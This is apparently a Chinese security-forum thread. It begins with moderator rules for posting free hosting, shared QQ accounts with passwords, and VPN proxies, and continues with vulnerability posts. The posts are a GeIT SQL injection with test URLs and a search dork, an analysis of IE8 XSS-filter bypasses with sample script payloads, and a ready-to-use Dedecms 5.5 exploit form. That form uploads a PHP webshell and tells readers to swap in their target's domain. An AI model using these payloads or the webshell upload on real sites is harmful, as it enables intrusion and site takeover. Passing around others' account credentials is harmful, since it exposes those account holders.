最近看过此主题的会员

返回列表 发帖

发布免费空间、QQ号和代理资源前请先阅读本帖!!!

目前本版块发布免费空间和QQ号的比较多。由于精力有限,无法做太多的测试检查。所以制定以下限制的制度。望各位发布此类资源时注意一下。
一、免费空间
1、必需提供注册地址(看清楚,是实际注册地址!),直接发布网站地址者,视为广告,删除扣分;
2、必须提供演示连接(连接必须真实有效,无连接或连接失效,删之。如连接为挂马地址,删除ID!不得利用此机会发布广告连接,违反者删帖扣分!);
3、不要发布重复资源,如发现删帖扣分;
4、所有空间的宣传连接一律删帖扣分;
二、QQ号
1、请自行测试有效性再进行发布,版主将随即进行抽查。无效密码达到1/10将删帖;
2、QQ号发布帖将以3天为周期进行删除;
请在发布号码时附带至少2个有效性证明截图,否则将做删帖扣分处理。(总之是为了增强发帖人的责任心,为广大会员朋友负责,以及减少版主无谓的劳动
从本帖发布之日起开始实行,之前出现的问题不再追究责任。
三、代理资源1、只接受VPN代理资源,其他的免发。一经发现,删帖扣分。
                                                        即日开始执行    2010年10月1日

 

您可能还想看的主题:

新手报道

特工间谍必备学习资源

 1G免费空间

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

GeIT管理系统SQL盲注漏洞
出问题的文件index.asp
类型:sql盲注,注入。
测试:
http://www.sitedirsec.com/index.asp?CID=27+and+1=1–
http://www.sitedirsec.com/index.asp?CID=27+and+1=2–
http://www.sitedirsec.com/index.asp?CID=[SQLI]
谷歌关键词:intext:”powered by GeIT Systems”


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

IE8安全警告问题

漏洞说明:IE8是微软新推出的一款浏览器,其对CSS2.1的完整支持,HTML5的支持,内置开发工具等等。IE8在浏览器安全性上有非常大的改进,内置了一款无法卸载的Xss Filter,对非持久型跨站脚本攻击做了比较好的防护。但是80sec在测试IE8时,发现IE8在设计Xss Filter时存在逻辑上的错误,可能导致一些原本不存在漏洞的站点出现安全问题,并且IE8也并没有从根本上解决跨站脚本攻击问题,甚至针对非持久型跨站脚本攻击在变通攻击方法之后一样可能被利用。而在一些书写不严谨的web站点上,IE8的Xss Filter根本发挥不了任何作用。
漏洞站点:http://www.microsoft.com/漏洞解析:通过我们研究后发现IE8的Xss Filter的基本原理是根据一些已知的攻击情况所集成的规则库来匹配书写的URL,如果匹配规则就发出警告,并且将站点回显的页面里的相关匹配内容替换成无危害的类型。这一过程存在很多问题
1 匹配的规则问题
IE8只能对一些已知的简单规则进行匹配,并且不能防止JavaScript Injection和一些Dom操作带来的XSS,对于持久型Xss更是无能为力。所以IE8在防止Xss方面只是做了非常非常小的一部。这一步对于一些书写不严谨的站点更是起不了任何作用。譬如一个Dom Xss[Thanks Luoluo]
Dom XSS In IE8
可以看到XSS一样触发。
2 如何在IE8下进行非持久XSS[该问题受同源策略影响]
IE8只是给人一种安全感,他并不能修复站点的安全漏洞。对于黑客来讲,他只需要把原来的XSS放到iframe里就一样可以用来攻击该站点,并不能从根本上解决跨站。譬如原来是
http://www.80sec.com/?url=<script>alert()</script>
会被拦截,但是当你用
<iframe src=’http://www.80sec.com/?url=<script>alert()</script>’></iframe>
一样可以利用,不过可能需要一些更深入的技巧。
3 IE8使很多的站点存在安全隐患
IE8的防护设计是当有违反规则的输入在URL里时,就把页面相应的内容给替换掉,而不管这个页面的内容是不是由用户输入造成的。黑客利用这一点,可以替换目标站点的某些代码,而实现这个只需要在地址后面加一个无关紧要的输入。如果被替换的内容涉及到一些页面逻辑,就可能被上下文利用,使用IE8的话,任何站点都可能成为攻击目标。
http://www.baidu.com/?80sec=<meta%20http-equiv=Content-Type%20content=”text/html;charset=gb2312″>
看看,在IE8下上面URL是不是乱了,当然,我们可以利用这个特性注释掉很多东西,如JS等等,都可以导致目标站点存在安全隐患,甚至被利用。
4. IE8的Xss Filter功能具有同源策略特性。
IE8的Xss Filter功能具有同源策略特性,相对于大部分非持久型XSS,如果攻击点来源于被攻击网站,将不会对XSS情况进行拦截。说明IE8的Xss Filter功能在设计时,决定完全信任来自本域的访问,例如
http://www.baidu.com/?xss=<script>alert(’xss’)
这类链接如果出现在www.baidu.com域内的页面被点击触发XSS漏洞,IE8的Xss Filter将不会拦截。
漏洞状态:等候官方回应


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Dedecms5.5页面变量未初始漏洞
影响版本:Dedecms 5.5
漏洞产生文件位于includedialogselect_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。代码如下:
<html><head><title>Dedecms v55 RCE Exploit Codz By flyh4t</title></head><body style="FONT-SIZE: 9pt">---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br /><form action=http://www.sitedir.com.cn/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'><input type='hidden' name='activepath' value='/data/cache/' /><input type='hidden' name='cfg_basedir' value='../../' /><input type='hidden' name='cfg_imgtype' value='php' /><input type='hidden' name='cfg_not_allowall' value='txt' /><input type='hidden' name='cfg_softtype' value='php' /><input type='hidden' name='cfg_mediatype' value='php' /><input type='hidden' name='f' value='form1.enclosure' /><input type='hidden' name='job' value='upload' /><input type='hidden' name='newname' value='fly.php' />Select U Shell <input type='file' name='uploadfile' size='25' /><input type='submit' name='sb1' value='确定' /></form><br />It's just a exp for the bug of Dedecms V55...<br />Need register_globals = on...<br />Fun the game,get a webshell at /data/cache/fly.php...<br /></body></html>
请自行修改form表单对应的网站域名


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表